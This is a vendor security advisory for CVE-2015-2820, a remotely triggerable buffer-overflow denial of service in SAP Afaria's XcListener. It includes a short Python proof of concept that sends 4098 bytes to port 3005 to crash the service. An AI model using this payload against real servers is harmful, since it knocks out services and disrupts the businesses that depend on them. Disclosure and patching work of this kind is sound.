Application: SAP Afaria 7.0.6001.5 Vendor URL:http://www.sap.com **Bugs:**BoF **Reported:**09.12.2014 **Vendor response:**10.12.2014 **Date of Public Advisory:**15.03.2015 **Reference:**SAP Security Note 2132584 Author: Vahagn Vardanyan (ERPScan)
Class: DoS [CWE-400]
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-2820
It is possible to use denial of service to terminate the process of the vulnerable component. As a result, nobody can use this service, which has a negative influence on business processes. System downtime also harms business reputation.
An anonymous attacker can use a special request to crash the XcListener process on the server.
VULNERABLE PACKAGES SAP Afaria 7 Other versions are probably affected too, but they were not checked.
A vulnerability has been discovered in certain landscape configurations of SAP Afaria that utilize XcListener for initiating client-to-server communications. SAP has released security patches for the vulnerable clients, Windows Mobile, Windows CE, and Windows. Windows Phone is not affected. SAP strongly recommends that customers patch their servers.
An anonymous attacker can use a special request to crash the XcListener process on the server.
import socket HOST = AFARIA_IP # The remote host PORT = 3005 # The same port as used by the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) PoC = ‘A’*4098 s.send(PoC) data = s.recv(1024) s.close() print ‘Received’, (data)
1
2
3
4
5
6
7
8
9
10
11
|
import socket
HOST = AFARIA_IP # The remote host
PORT = 3005 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
PoC = ‘A’*4098
s.send(PoC)
data = s.recv(1024)
s.close()
print ‘Received’, (data)
—|—
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:
* [SAP Vulnerability Assessment](<http://erpscan.com/services-2/sap-vulnerability-assessment/>)
* [SAP Security Assessment](<http://erpscan.com/services-2/sap-security-assessment/>)
* [SAP Security Trainings](<http://erpscan.com/services-2/sap-security-trainings/>)
* [SAP Custom code security review](<http://erpscan.com/services-2/sap-custom-code-security-review/>)
* [SAP Penetration testing](<http://erpscan.com/services-2/sap-penetration-testing/>)